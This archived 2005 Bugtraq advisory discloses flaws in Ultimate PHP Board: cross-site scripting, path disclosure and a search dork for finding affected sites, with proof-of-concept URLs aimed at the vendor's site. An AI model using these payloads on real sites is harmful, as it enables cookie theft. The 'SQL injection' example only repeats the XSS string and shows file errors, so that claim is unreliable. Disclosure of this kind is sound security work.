lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050513131227.27553.qmail@www.securityfocus.com> Date: 13 May 2005 13:12:27 -0000 From: Morinex Eneco <m0r1n3x@...il.com> To: bugtraq@...urityfocus.com Subject: Ultimate PHP Board (UPB) Security Advisory # Ultimate PHP Board (UPB) Security Advisory # By : Morinex # e-mail : morinex[at]marocmafia com # date : 13-05-2k5 # shoutz : w00pie.nl - Woopie >Target : Ultimate PHP Board (UPB) >Vulnerable Versions: v. 1.8 until v 1.9.6 >URL : http://www.myupb.com - http://www.myupb.com/forum/ Tested Localhost , Myupb.com. UPB is a forum/message board script. It supports threaded discussion with a comprehesivetext database system that we wrote here at php outburst for the backend. We are almost at theend of getting rid of all the bugs associated with developing the forum. We strive of userimput because thats what really makes a good forum. If you experience any problems with ourforum please submit a support question on our forum(forum.myupb.com) One of our members will be glad to helpyou out. Letīs start - HTML injection Proof of Concept: * http://www.myupb.com/forum/viewforum.php?id=t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3Cnote%20unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C')%20==%20'%22%3E<script>alert(document.cookie)</script>%3C -SQL injection Proof of Concept: * http://www.myupb.com/forum/viewforum.php?id=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C Warning: fopen(./db/123456_sorted.dat): failed to open stream: No such file or directory in /home/pilot/public_html/forum/textdb.inc.php on line 246 Warning: fclose(): supplied argument is not a valid stream resource in /home/pilot/public_html/forum/textdb.inc.php on line 248 1 (A remote attacker can inject some SQL tables from textdb.inc.php ) -Full path disclosure Proof of Concept: http://www.myupb.com/forum/viewforum.php?id=123456789123456789&postorder=Morinex Result : No such file or directory in /home/pilot/public_html/forum/textdb.inc.php on line 246 Solution : Dont use this f*cking board :) *Google/Yahoo : "Powered by UPB Version"*